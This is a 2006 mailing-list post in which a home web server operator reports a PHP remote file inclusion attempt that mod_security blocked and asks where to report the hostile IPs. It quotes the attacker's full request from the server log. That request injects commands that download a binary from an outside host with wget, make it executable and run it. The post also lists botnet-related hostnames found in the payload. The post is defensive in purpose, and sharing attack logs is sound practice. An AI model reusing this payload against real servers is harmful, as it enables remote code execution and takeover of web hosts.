[Modsecurity] hello, newbie user here
ET
etharp at earthlink.net
Sat Jun 10 09:34:57 EDT 2006
as this is my first post to this list, I want to first say hello, and
thanks for mod_security.
now to my real question.
I run a 'hobby' Apache 2 (on Mandrivia 2006) webserver off my home
computer and cable modem connection, (runnig mod security, now, of
course) and I have always read the webserver's logs, recently I saw a
known PHP exploit that mod security stopped;
194.242.112.72 - - [09/Jun/2006:03:16:45 -0400] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|
HTTP/1.1" 500 2659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
I normally do a whois lookup and notify the owners of the offending IPs,
and ask for them to secure the boxes.
In this particular log entry for this exploit, I noticed not only the
offending IP of 194.242.112.72, but also a couple of pages at
72.18.195.161, mainly; "http://72.18.195.161/cmd.gif", and
"72.18.195.161/lnikon".
I had seen that "command.gif" is really a text file, but had not seen
the "lnikon", and so I clicked and saved the "lnikon" file, which in
turn called 2 files, one named "linux-kernel: and one called
"linux-mkdir" both of which are binary files. if I open the files with
"khexedit" I can "extract strings" and see a few entries with
"newchrousty.org" in the name (Sympatico.Qc.Ca.newchrousty.org,
Chat.newchrousty.org, micro-ISP.newchrousty.org,
LaLiPus.newchrousty.org, Trois-Rivieres.QC.Ca.newchrousty.org,
IRC.newchrousty.org,) and I also note the "72.18.195.161/" IP to be
written into the script for the 'linux-mkdir' file as is the IPs
'24.224.174.18' and '81.223.104.152'
Since these IPs do not show up in spamcops black lists, I am wondering
if and to whom I should be reporting this info to? or should I not care,
am I worrying about something there is no cure for at this time??
--
reg. Linux User 167806
webhome http://ed-tharp.is-a-geek.org
More information about the Modsecurity
mailing list